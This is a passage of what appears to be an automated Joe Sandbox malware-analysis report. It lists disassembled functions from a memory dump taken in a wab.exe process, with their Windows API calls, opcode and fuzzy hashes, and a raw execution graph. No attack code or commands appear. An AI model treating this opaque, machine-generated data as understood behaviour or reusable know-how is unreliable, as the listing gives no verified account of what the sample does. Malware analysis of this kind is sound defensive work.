                                                • memset.MSVCRT ref: 00417B7B
                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ErrorLastLockUnlockmemset
                                                • String ID:
                                                • API String ID: 3727323765-0
                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                • malloc.MSVCRT ref: 00417407
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@malloc
                                                • String ID:
                                                • API String ID: 4284152360-0
                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040F673
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                • strlen.MSVCRT ref: 0040F6A2
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040F6E2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                • strlen.MSVCRT ref: 0040F70D
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00402FD7
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                • strlen.MSVCRT ref: 00403006
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                • String ID:
                                                • API String ID: 764393265-0
                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Time$System$File$LocalSpecific
                                                • String ID:
                                                • API String ID: 979780441-0
                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • memcpy.MSVCRT ref: 004134E0
                                                • memcpy.MSVCRT ref: 004134F2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$DialogHandleModuleParam
                                                • String ID:
                                                • API String ID: 1386444988-0
                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: InvalidateMessageRectSend
                                                • String ID: d=E
                                                • API String ID: 909852535-3703654223
                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcschr.MSVCRT ref: 0040F79E
                                                • wcschr.MSVCRT ref: 0040F7AC
                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcschr$memcpywcslen
                                                • String ID: "
                                                • API String ID: 1983396471-123907689
                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • _memicmp.MSVCRT ref: 0040C00D
                                                • memcpy.MSVCRT ref: 0040C024
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FilePointer_memicmpmemcpy
                                                • String ID: URL
                                                • API String ID: 2108176848-3574463123
                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemcpy
                                                • String ID: %2.2X
                                                • API String ID: 2789212964-323797159
                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintf
                                                • String ID: %%-%d.%ds
                                                • API String ID: 3988819677-2008345750
                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040E770
                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSendmemset
                                                • String ID: F^@
                                                • API String ID: 568519121-3652327722
                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PlacementWindowmemset
                                                • String ID: WinPos
                                                • API String ID: 4036792311-2823255486
                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                • wcscat.MSVCRT ref: 0040DCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileModuleNamewcscatwcsrchr
                                                • String ID: _lng.ini
                                                • API String ID: 383090722-1948609170
                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                • API String ID: 2773794195-880857682
                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID:
                                                • API String ID: 438689982-0
                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$memset
                                                • String ID:
                                                • API String ID: 1860491036-0
                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • memcmp.MSVCRT ref: 00408AF3
                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                • memcmp.MSVCRT ref: 00408B2B
                                                • memcmp.MSVCRT ref: 00408B5C
                                                • memcpy.MSVCRT ref: 00408B79
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmp$memcpy
                                                • String ID:
                                                • API String ID: 231171946-0
                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcslen$wcscat$wcscpy
                                                • String ID:
                                                • API String ID: 1961120804-0
                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.4%
                                                Dynamic/Decrypted Code Coverage:20.4%
                                                Signature Coverage:0.5%
                                                Total number of Nodes:847
                                                Total number of Limit Nodes:16
                                                execution_graph 34109 40fc40 70 API calls 34282 403640 21 API calls 34110 427fa4 42 API calls 34283 412e43 _endthreadex 34284 425115 76 API calls __fprintf_l 34285 43fe40 133 API calls 34113 425115 83 API calls __fprintf_l 34114 401445 memcpy memcpy DialogBoxParamA 34115 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33243 444c68 __set_app_type __p__fmode __p__commode 33242->33243 33245 444cfa 33243->33245 33246 444d02 __setusermatherr 33245->33246 33247 444d0e 33245->33247 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33300 40cf64 33263->33300 33319 410d0e 33263->33319 33265 40cf6f 33323 40ccd7 ??2@YAPAXI 33265->33323 33267 40cf9b 33337 407cbc 33267->33337 33272 40cfc4 33355 409825 memset 33272->33355 33273 40cfd8 33360 4096f4 memset 33273->33360 33278 40d181 ??3@YAXPAX 33280 40d1b3 33278->33280 33281 40d19f DeleteObject 33278->33281 33279 407e30 _strcmpi 33282 40cfee 33279->33282 33384 407948 ??3@YAXPAX ??3@YAXPAX 33280->33384 33281->33280 33284 40cff2 RegDeleteKeyA 33282->33284 33285 40d007 EnumResourceTypesA 33282->33285 33284->33278 33287 40d047 33285->33287 33288 40d02f MessageBoxA 33285->33288 33286 40d1c4 33385 4080d4 ??3@YAXPAX 33286->33385 33290 40d0a0 CoInitialize 33287->33290 33365 40ce70 33287->33365 33288->33278 33382 40cc26 strncat memset RegisterClassA CreateWindowExA 33290->33382 33292 40d1cd 33386 407948 ??3@YAXPAX ??3@YAXPAX 33292->33386 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33383 40c256 PostMessageA 33295->33383 33297 40d061 ??3@YAXPAX 33297->33280 33301 40d084 DeleteObject 33297->33301 33298 40d09e 33298->33290 33300->33256 33300->33257 